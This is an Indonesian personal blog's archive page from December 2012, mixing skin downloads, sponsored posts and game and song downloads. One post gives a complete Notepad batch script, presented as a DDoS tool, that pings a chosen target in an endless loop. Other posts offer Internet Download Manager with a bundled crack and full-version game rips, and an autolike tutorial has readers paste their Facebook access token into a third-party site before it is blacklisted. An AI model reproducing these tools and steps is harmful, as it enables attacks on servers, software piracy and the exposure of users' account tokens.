Senin, 31 Desember 2012

30 Percantik Tampilan Winamp dengan "Winamp Matrix Skin"

Percantik Tampilan Winamp dengan "Winamp Matrix Skin" | Cirebon-Cyber4rt - Lama nggak update nih, dikarenakan banyak kegiatan didunia nyata. Apalagi sekarang saya sudah kelas 3, sibuk ngurusin inilah, itulah. Nah, sekarang saya akan sempatkan update hehehe...

Percantik Tampilan Winamp dengan "Winamp Matrix Skin"

Winamp Matrix Skin merupakan salah satu tampilan dari player musik yang sangat populer dimasyarakat, Desain yang serba hijau, dengan dihiasi tombol-tombol bergaya nyentrik ala 3D. Cara instalnya pun sangat mudah, sobat hanya tinggal meletakan Winamp Matrix Skin hasil download ke directory C:\Program Files\Winamp\Skins lalu klik file bernama Matrix_Online dan lihat hasilnya.

Screenshoot :
Percantik Tampilan Winamp dengan "Winamp Matrix Skin"

Percantik Tampilan Winamp dengan "Winamp Matrix Skin"

Download Link :
Cara Instal :
  1. Download Winamp Matrix Skin
  2. Copy Matrix_Online
  3. Paste'kan di Directory C:\Program Files\Winamp\Skins
  4. Double Click file bernama Matrix_Online
  5. Selesai & Lihat hasilnya.
Winamp Matrix Skin ini sangat cocok apabila disatukan dengan Windows XP - Matrix Skin Pack 2.0. Gimana, tertarik untuk mengganti tampilan standar winamp sobat yang gitu-gitu aja? hehee :D

Sekian saja postingan saya kali ini tentang Percantik Tampilan Winamp dengan "Winamp Matrix Skin", semoga dapat bermanfaat.

Description: Percantik Tampilan Winamp dengan "Winamp Matrix Skin" Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Percantik Tampilan Winamp dengan "Winamp Matrix Skin"

Kamis, 27 Desember 2012

9 Seragam Kerja Kantor Berkualitas Hanya di Surewi

Seragam Kerja Kantor Berkualitas Hanya di Surewi | Cirebon-Cyber4rtSurewi Seragam merupakan salah satu pusat pelayanan pembuatan seragam kantor paling bagus saat ini. Dengan mekanisme pembuatan produk yang dilakukan oleh profesional, sudah pasti seragam yang dibuat oleh Surewi sangatlah berkualitas.

Setelah sebelumnya saya memposting Seragam Kerja Kantor Murah di Surewi kali ini saya akan share lagi toko seragam paling bagus ini. Selain produk seragamnya yang berkualitas, harganya pun relatif murah meriah.Cara malakukan pemesanannya juga tidak sulit, Jika anda berminat untuk memesan silahkan kesini How To Order.

Seragam Kerja Kantor Berkualitas Hanya di Surewi

Informasi Kontak Surewi Seragam :
Telepon: 021 - 83662219 Atau 021 - 94484494 ( Selengkapnya )


Informasi Produk Surewi Seragam :
Contoh Seragam Kerja, seragam kerja kantor, seragam kerja tambang, seragam kerja karyawan seragam kerja pabrik, seragam kerja restauran, seragam kerja dinas, poloshirt, celana panjang dan pendek, baju lengan pendek, jas, jaket, topi dan lain-lain.

Contoh Seragam Kerja :
Seragam Kerja Kantor Berkualitas Hanya di Surewi
Seragam Kantor

Surewi Wardrobe memang surganya seragam, selain bahannya yang berkualitas tinggi, harganya juga relatif lebih murah. Jadi jika anda ingin membuat seragam untuk pemasaran sebuah produk atau seragam untuk karyawan dikantor, pesan hanya di Seragam Kerja Kantor Berkualitas Hanya di Surewi.


Seragam Kerja Kantor Berkualitas Hanya di Surewi

Surewi Wardrobe
Alamat: Jl. Tanah Seratus No. 15 RT/RW 05/11
Sudimara Jaya, Ciledug, Tangerang 15151

Link Kontes: Seragam Kerja Kantor Berkualitas Hanya di Surewi
Description: Seragam Kerja Kantor Berkualitas Hanya di Surewi Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Seragam Kerja Kantor Berkualitas Hanya di Surewi

17 Seragam Kerja Kantor Murah di Surewi

Seragam Kerja Kantor Murah di Surewi | Seragam Kerja Kantor Murah di Surewi Seragam Kerja Kantor Murah di Surewi Cirebon-Cyber4rt - Bagi anda yang ingin mencari berbagai macam seragam dengan bahan berkualitas dan dengan harga yang terjangkau, anda bisa mendapatkannya hanya di surewi-seragam.com. Surewi-seragam.com adalah situs website yang melayani pemesanan berbagai macam jenis seragam

Sekilas Tentang Surewi
Surewi Wardrobe adalah situs web yang melayani pembuatan berbagai macam seragam, mulai dari seragam kerja, seragam kerja kantor, seragam kerja karyawan, seragam kerja restauran, seragam kerja hotel, seragam kerja bank, seragam kerja tambang dan lainnya, toko Seragam Kerja Kantor Murah di Surewi memang pusat seragam paling berkualitas di Indonesia saat ini.

Produk Surewi
Sebagai salah satu pusat seragam terbaik saat ini, surewi-seragam menyediakan berbagai macam jenis seragam, produk seragam surewi yaitu Seragam Kerja, kemeja lengan pendek/panjang, celana pendek/panjang, Poloshirt, T-shirt, topi, jaket dan lain-lain.

Contoh Seragam Kerja di Surewi
Dibawah ini adalah contoh seragam kerja kantor dan seragam kerja tambang yang diproduksi oleh surewi, selain seragam kerja kantor, masih ada banyak lagi jenis seragamnya.

Seragam Kerja Karyawan
Seragam Kerja Kantor Murah di Surewi

Seragam Kerja Tambang
Seragam Kerja Kantor Murah di Surewi

Pemakaian seragam dalam sebuah pekerjaan adalah sangat penting, karena dengan menggunakan seragam, dapat membangun sebuah citra sebuah produk atau sebuah perusahaan. Jadi jika anda ingin membuat seragam kerja yang berkualitas dan harga yang terjangkau hanya di Seragam Kerja Kantor Murah di Surewi.

Jika anda berminat memesan seragam di surewi-seragam, anda bisa menggunakan informasi kontak dibawah ini :

Surewi Wardrobe
Jl. Tanah Seratus No. 15 RT 05 / RW 11 Sudimara Jaya Ciledug, 15151 Tangerang. Telepon ( 021 ) 83662219 - Email: surewiwardrobe@yahoo.com

Banner Exchange

Description: Seragam Kerja Kantor Murah di Surewi Rating: 3.5 Reviewer: Admin ItemReviewed: Seragam Kerja Kantor Murah di Surewi

Senin, 24 Desember 2012

31 Download Game The House Of The Dead 2 RIP Full Version

Download Game The House Of The Dead 2 RIP Full Version | Cirebon-Cyber4rt - Setelah sebelumnya saya share versi pertamanya, kali ini saya akan share versi keduanya. Game The House Of The Dead 2 ini adalah versi lanjutan dari game yang pernah saya share waktu itu, yaitu THOTD 1.

The House Of The Dead 2

Dalam game ini kita disuruh membunuh Zombie yang menguasai kota, grafisnya sudah lumayan bagus dibanding versi pertama. Dan tentunya efek yang ditimbulkan lebih seru dan menantang kita. Bagi yang penasaran ingin bermain game ini, saya sudah siapkan link downloadnya dibawah ini.

Screeshoot :



System Requirements :
  • OS Windows XP
  • Processor Pentium III @ 450 MHz
  • 64 MB Memory
  • 600 MB Free HDD Space
  • DirectX 8.0
  • Input: Keyboard dan Mouse
Download Link :
Cara Install :
  1. Download kedua link Part1, Part2
  2. Masukan semua part dalam satu folder
  3. Extract file bernama THOTD 2.part1.rar
  4. Maka secara otomatis Part2 akan ter-extract
  5. Buka folder THOTD 2 kemudian UnZip
  6. Tunggu beberapa menit,
  7. Enjoy.
Dan jika ada kesempatan dilain waktu, Insya Allah saya akan share yang versi 3 nya. Ok, sekian saja postingan saya siang ini tentang Download Game The House Of The Dead 2 RIP Full Version, semoga dapat menjadi hiburan bagi sobat.

Description: Download Game The House Of The Dead 2 RIP Full Version Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Download Game The House Of The Dead 2 RIP Full Version

Minggu, 23 Desember 2012

53 Cara Membuat Tool DDoS Sederhana dari Notepad

Cara Membuat DDoS Sederhana dari Notepad | Cirebon-Cyber4rt - DDoS merupakan salah satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses.

Cara Membuat Tool DDoS Sederhana dari Notepad
DDos Tools

Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.

1. Buka Notepad
Cara Membuat Tool DDoS Sederhana dari Notepad

2. Masukan Kode Berikut Ini :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save As...
Cara Membuat Tool DDoS Sederhana dari Notepad

4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
Cara Membuat Tool DDoS Sederhana dari Notepad

5. Buka file yang sudah dibuat tadi,

6. Jika berhasil tampilannya akan seperti ini :
Cara Membuat Tool DDoS Sederhana dari Notepad

7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.

Dengan serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya :)

Sekian saja postingan saya siang ini tentang Cara Membuat Tool DDoS Sederhana dari Notepad, semoga dapat bemanfaat.

Credits: Binus Hacker

Description: Cara Membuat Tool DDoS Sederhana dari Notepad Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Cara Membuat Tool DDoS Sederhana dari Notepad

Sabtu, 22 Desember 2012

64 Mengubah Tampilan Windows XP/7 Menjadi Windows 8

Mengubah Tampilan Windows XP/7 Menjadi Windows 8 | Cirebon-Cyber4rt - Bagi sobat yang belum bisa merasakan indahnya tampilan Windows 8, kali ini ngga usah kecewa. Karena ada Skin Pack Windows 8 yang ukurannya lumayan kecil.

Setelah sebelumnya saya memposting Matrix Skin Pack untuk Windows XP, sekarang saya akan posting tentang Skin Pack Windows 8 sob. Jadi tunggu apalagi, buruan ganti tampilan Windows'mu dengan skin pack keren ini!

Screenshoot :
Mengubah Tampilan Windows XP/7 Menjadi Windows 8

Mengubah Tampilan Windows XP/7 Menjadi Windows 8

Mengubah Tampilan Windows XP/7 Menjadi Windows 8

Download Link :
Cara Instal :
  1. Download kemudian Extract
  2. Buka folder bernama "Windows 8 Skin Pack 2.0"
  3. Instal dan tunggu hingga selesai
  4. Restart PC/Laptop
  5. Selesai.
Catatan :
Sebelum menginstal Windows 8 Skin Pack 2.0 ini, sobat harus menginstal Net FrameWork 4.0 terlebih dulu.

Windows 8 Skin Pack 2.0 ini sangat ringan dan tentunya sangat mudah dalam proses instalasi. Saya sudah test software ini dan hasilnya work tanpa ada masalah. Jika kalian tertarik mengganti tampilan Windows XP/7 dengan Skin Pack Windows 8 ini silahkan langsung download aja hehehe.

Sekian postingan saya kali ini tentang Mengubah Tampilan Windows XP/7 Menjadi Windows 8, semoga dapat bermanfaat.

Description: Mengubah Tampilan Windows XP/7 Menjadi Windows 8 Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Mengubah Tampilan Windows XP/7 Menjadi Windows 8

8 Free Download Lagu PSY Ft. Hyuna - Gangnam Style

Free Download Lagu PSY Ft. Hyuna - Gangnam Style | Cirebon-Cyber4rt - Gangnam Style, pastinya kalian sudah tidak asing lagi dengan judul lagu yang satu ini. Sebuah lagu yang dipopulerkan oleh PSY penyayi rapper asal Korea Selatan.

Setelah sukses dengan video klip Gangnam Style pertamanya yang mengundang decap kagum seantero dunia, kali ini PSY membuat sebuah video klip lagi. Yang berbeda dari video klip berikut adalah PSY berduet dengan Hyuna personil 4Minute.

Screenshoot :
Free Download Lagu PSY Ft. Hyuna - Gangnam Style

Free Download Lagu PSY Ft. Hyuna - Gangnam Style

Free Download Lagu PSY Ft. Hyuna - Gangnam Style

Download Mp3 :
Hyuna sendiri sudah tidak asing lagi pada lagu Gangnam Style, karena sebelumnya pada video clip pertama dia sudah ikutan, namun dia tidak menyanyi, melainkan hanya sebagai dancer girlnya PSY.

Video Klip :

Sekian postingan saya kali ini tentang Free Download Lagu PSY Ft. Hyuna - Gangnam Style, semoga dapat bermanfaat bagi sobat.

Description: Free Download Lagu PSY Ft. Hyuna - Gangnam Style Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Free Download Lagu PSY Ft. Hyuna - Gangnam Style

Kamis, 20 Desember 2012

29 Download Samurai Vengeance II Full Version - PC Game

Download Samurai Vengeance II Full Version - PC Game | Cirebon-Cyber4rt - Sebelum Hari Kiamat tiba, saya akan memposting sebuah game yang bergenre Adventure. Samurai Vengeance II adalah sebuah game yang menceritakan seorang ahli Samurai untuk membalas dendam kepada musuh-musuhnya.

Samurai Vengeance II
Samurai Vengeance II

Didalam game ini kita diperintahkan untuk membunuh semua musuh, dan disetiap levelnya akan semakin sulit. Game ini sangat compactible dengan semua OS. Sudah saya coba di Windows XP Sp3 dan berjalan mulus.

Screenshoot :
Download Samurai Vengeance II Full Version - PC Game

Download Samurai Vengeance II Full Version - PC Game

Download Samurai Vengeance II Full Version - PC Game

Rekomendasi Sistem :
  • OS Windows XP/Vista/7
  • Processor Pentium III @ 800 MHz or Hingher.
  • RAM : 512 MB
  • Video Card RAM : 64 MB
  • DirectX version 9.0c or Above
Download Link :
Cara Download :
  1. Klik Samurai Vengeance II
  2. Sobat akan menuju "Adf.ly" tunggu 5 Detik
  3. Kemudian klik Lewati/Skip Ad dibagian kanan atas,
  4. Masukan password pada kolom link TusFile
  5. Klik Download.
Agar proses mendownload lebih mudah dan cepat, gunakan software Internet Download Manager ( Disini ). Jika masih ada kendala, silahkan berikan komentar dibawah ini.

Sekian postingan saya kali ini tentang Download Samurai Vengeance II Full Version - PC Game, semoga dapat bermanfaat.

Description: Download Samurai Vengeance II Full Version - PC Game Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Download Samurai Vengeance II Full Version - PC Game

42 Free Download Visual Basic 6.0 Portable Version

Free Download Visual Basic 6.0 Portable Version | Cirebon-Cyber4rt - Visual Basic 6.0 adalah sebuah tools bahasa pemrograman yang sangat mudah untuk dipelajari. Tools ini biasa dipakai oleh seorang programer untuk membuat sebuah aplikasi.

Free Download Visual Basic 6.0 Portable Version
Visual Basic 6.0

Dasar pembuatan dalam tools Visual Basic 6 adalah Form, yaitu dimana programer/pengguna bisa mengatur tampilan form lalu diproyeksikan dalam script yang sangat mudah. Dan kali ini saya akan membagikan Visual Basic 6 Portable secara gratis.

Screenshoot :
Free Download Visual Basic 6.0 Portable Version

Download Link :
Cara Penggunaan :
  1. Download kemudian Exrtact
  2. Buka folder bernama "Visual Basic 6.0 Portable"
  3. Double click icon VB 6 Portable
  4. Selesai.
Visual Basic 6.0 ini versi portable, jadi sobat bisa langsung memakainya tanpa harus menginstalnya. Itulah salah satu kelebihan software portable.

Sekian postingan saya kali ini tentang Free Download Visual Basic 6.0 Portable Version, semoga dapat bermanfaat.

Description: Free Download Visual Basic 6.0 Portable Version Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Free Download Visual Basic 6.0 Portable Version

Rabu, 19 Desember 2012

24 Internet Download Manager 6.14 Final Full Patch

Internet Download Manager 6.14 Final Full Patch | Cirebon-Cyber4rt - Internet Download Manager saat ini mengupdate versi terbarunya, yaitu IDM 6.14 Final. Tidak ada versi 6.13, mungkin karena ada angka 13 yang dianggap angka sial.

Internet Download Manager 6.14 Final Full Patch
IDM 6.14 Final

Dan kali ini saya akan memposting software downloader terbaik didunia saat ini, yaitu Internet Download Manager 6.14 Final Full Patch. Tool Pacthernya sudah saya masukan didalam file download.

Screenshoot :
Internet Download Manager 6.14 Final Full Patch

Fitures :
  • Peningkatan Intergrasi Windows 8
  • Peningkatan untuk Protected Mode pada IE 10
  • Perbaikan Bug.
Download Link :
Sekian postingan saya kali ini tentang Internet Download Manager 6.14 Final Full Patch, semoga dapat bermanfaat.

Description: Internet Download Manager 6.14 Final Full Patch Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Internet Download Manager 6.14 Final Full Patch

Sabtu, 15 Desember 2012

43 Software Untuk Mengunci Keyboard Dan Mouse

Software Untuk Mengunci Keyboard Dan Mouse | Cirebon-Cyber4rt - Hallo guys, udah lama admin ngga ngeshare software nih. Ada kejadian yang ngga bikin saya ngga mod, semua file yang saya upload ke Sharebeast dan Mediafire dihapus secara sepihak oleh admin website file storage tersebut.

Tapi jangan khawatir, saat ini saya sedang berusaha meng-upload ulang file-file yang sudah diremove. Walaupun agak lama prosesnya. Nah, kali ini saya akan share sebuah software kecil namun efeknya sangatlah besar.

Nama softwarenya adalah KeyFreeze, sebuah software kecil yang mampu mengunci akses ke keyboard dan mouse PC sobat dengan hanya sekali klik.

Screenhoot :

Download Link :
Cara instal dan penggunaan sudah ada didalam file download, software ini sudah saya coba dan Aman 100%. Jika masih ada kesulitan dalam proses instalasi silahkan berikan komentar dikotak yang sudah saya sediakan dibawah.

Sekian postingan saya kali ini tentang Software Untuk Mengunci Keyboard Dan Mouse, semoga dapat bermanfaat.

Description: Software Untuk Mengunci Keyboard Dan Mouse Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Software Untuk Mengunci Keyboard Dan Mouse

Kamis, 13 Desember 2012

22 Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7" | Cirebon-Cyber4rt - Wow! Acer lagi bagi-bagi hadiah sob, ngga main-main... hadiah utamanya adalah 'Acer Aspire Predator G7' sebuah paket CPU yang dikhusus untuk main game-game berat.

Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

Bukan hanya itu, ada juga beberapa hadiah yang tak kalah menariknya... Ada Mouse, Keyboard, Videocard, Keyboard dan Mousenya juga khusus untuk main game loh. Pokoknya jangan sampe kelewat deh...

Event ini dalam rangka special menyambut Hari Raya Natal yang akan dilaksanakan tepat pada 25 Desember nanti, dan ini merupakan acara tahunan yang sering diadakan oleh Perusahaan Acer.

Berikut Beberapa Hadiah Utama :
Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

1st :
Acer Aspire Predator G7Windows®7 Home Premium 64 bitIntel® Core™ i7-2600K CPU RAM 16 GB, 128 GB SSD, 1,5 TB HD2 x Nvidia® GTX 580

2nd :
Inte® Media ComboIntel® Core™ i5-2500K CPU Intel® Desktop Board DP67BA Media SeriesIntel® Solid-State Drive 510 Series, 250 GB

3rd :
Nvidia® GTX 680  + 3D Vision™ Glas Set

Lalu, Bagaimana Cara Mendatkan Hadiah Diatas? Caranya cukup mudah kok, kalian tinggal mengikuti langkah-langkahnya berikut ini :

Berikut Ini Caranya :
1. Buka tautan ini Aceresport

Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

2. Kemudian klik "Join In!" untuk memulai,

Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

3. Setelah itu klik "ke Aplikasi" bahwa sobat setuju,

Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

4. Klik "Like" lalu kemudian klik "Join In!"

Sobat sudah terdaftar dalam member dan siap untuk mendapatkan hadiah yang sudah saya jelaskan diatas. Ok, sekian saja postingan saya ini, semoga dapat bermanfaat.

Description: Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7" Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Ayo Ikut Gabung dan Dapatkan Hadiah "Acer Aspire Predator G7"

62 Autolike Status Facebook Bulan Desember 2012 - 100% Work

Autolike Status Facebook Bulan Desember 2012 - 100% Work | Cirebon-Cyber4rt - Malem sob, hari ini saya akan share trick Autolike Facebook Terbaru dan tentunya berhasil. Autolike adalah cara dimana status facebook kita disukai oleh orang lain secara otomatis.

Autolike Status Facebook Bulan Desember 2012 - 100% Work
Autolike Facebook 2012

Bagi yang penasaran ingin statusnya banyak yang ngelike, silahkan coba cara berikut ini. Saya sudah coba dan berhasil sob.

Tutorial Autolike Status Facebook :

1). Umur sobat minimal 18 tahun untuk menggunakan fitur ini.
2). Ubah opsi pelanggan "Subscribe Setting" Izinkan semua orang untuk berlangganan anda difacebook,
3). Setelah itu silahkan menuju ke link ini Likelo.com

Autolike Status Facebook Bulan Desember 2012 - 100% Work

4). Tekan "Click Here" pada Homepage untuk mendapatkan Akses Token,

Autolike Status Facebook Bulan Desember 2012 - 100% Work

5). Sesudah sobat mengklik "Click Here", Izinkan penginstalan aplikasi facebook.

Autolike Status Facebook Bulan Desember 2012 - 100% Work

6). Setelah menginstal aplikasi tersebut, Copy Url halaman tersebut ( Itu adalah Akses Token sobat )

Autolike Status Facebook Bulan Desember 2012 - 100% Work

7). Pastekan pada kolom Submit di Homepage, kemudian klik Submit.

Autolike Status Facebook Bulan Desember 2012 - 100% Work

8). Silahkan klik Submit dan tunggu proses Autolikenya bekerja.

Dan hasilnya bisa dilihat disalah satu status difacbook saya TKP

Penting :
  • Mengaktifkan opsi berlangganan sangatlah penting.
  • Tunggu agar halaman memuat dengan penuh.
  • Jangan klik tombol Submit lebih dari satu kali, karena akan gagal.
  • Lakukan dengan cepat karena situs tersebut hanya dapat memberikan autolike sampai akses token sobat habis waktunya ( Masa Kadaluwarsa 3 Menit )
  • Manfaatkan sebaik mungkin situs Likelo ini, sebelum diblacklist oleh pihak Facebook.
Hehehee, bagi yang mau ber 4lay ria dengan Autolike status facebook ini buruan yee... keburu ntar diblacklist ama facebooknya ^,^

Credits : Crackroach

Description: Autolike Status Facebook Bulan Desember 2012 - 100% Work Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Autolike Status Facebook Bulan Desember 2012 - 100% Work

Sabtu, 08 Desember 2012

77 Serunya NgeBLOG Murah & Hemat Bareng Indosat

Serunya NgeBLOG Murah & Hemat Bareng Indosat - NgeBlog merupakan salah satu kegiatan menulis suatu konten. Entah itu cerita sehari-hari, berita terkini, berbagi aplikasi terbaru atau sebagainya.

Kebanyakan para blogger adalah orang dewasa, namun anak-anak pun kini sudah banyak yang ikut mencoba menuangkan unek-uneknya lewat dunia blogging. Bisa dilihat dari beberapa Grup Blogger di facebook yang kebanyakan masih pelajar.

Serunya NgeBLOG Murah & Hemat Bareng Indosat
Serunya NgeBLOG Murah & Hemat Bareng Indosat

Nah, saya sendiri adalah seorang pelajar yang gemar sekali melakukan blogging. Awalnya saya cuma iseng-iseng, tapi entah mengapa lama-kelamaan jadi ketagihan :D Pagi, Siang, Malem dan hampir setiap hari saya selalu didepan komputer untuk merawat blog saya ini ( Ada jam istirahatnya juga siiih... hehehe )

Saya biasanya ngeblog pake komputer, tapi semenjak komputer saya rusak total, saya akhirnya berhenti dari kegiatan ngeblog tersebut dan vakum selama beberapa minggu. Namun, ada seorang teman yang hobi ngeblog juga memberi anjuran kalo ngeblog lewat handphone juga bisa.

Begini Percakapannya :
T = Teman
S = Saya

T : Eh bro, ane liat blog ente udah ngga pernah update lagi?
S : Iya nih bro... kompi ane rusak, jadi untuk sementara ane berhenti dulu.

T : Kenapa ga pake HP aja bro?
S : Emang bisa?

T : Bisa dong, ane udah hampir 1 bulan ini ngeblog pake HP...
S : Kan ribet bro, udah gitu emang ngga mahal apa pulsanya kalo ngeblog lewat HP?

T : Yaah ente, coba aja dulu. Terus ente paketin ke INDOSAT SUPER 3G Plus. Ane jamin dah maknyuus... selain murah, hemat juga bro... banyak bonus kuotanya!
S : Hmm, Yaudah bro, nanti saya coba saran ente.

Akhirnya, saya mencoba saran dari teman saya tersebut yaitu ngeblog lewat HP, Menggunakan paket INDOSAT SUPER 3G Plus yang hanya Rp. 5.000,- dengan total kuota 50 MB ( Disini Infonya ) sinyal penuh tanpa putus dan kecepatan internet yang lumayan kenceng, saya sudah bisa puas ngeblog seharian tanpa ada hambatan. Dan Insya Allah kalo ada rejeki, bulan depan saya berencana memakai paket bulanan.

INDOSAT SUPER 3G Plus
INDOSAT SUPER 3G Plus

Pokoknya pake Indosat ngga nyesel deh... selain Internetannya murah, tarif Nelpon dan SMSnya juga hemat, banyak bonus gratisnya pula hehee... Itulah cerita tentang pengalamanku NgeBlog Murah & Hemat Bareng Indosat. Indosat Emang Selalu Bikin Ceria! Terimakasih Indosat ^,^

Sekian,
Description: Serunya NgeBLOG Murah & Hemat Bareng Indosat Rating: 3.5 Reviewer: Muhammad Iqbal K ItemReviewed: Serunya NgeBLOG Murah & Hemat Bareng Indosat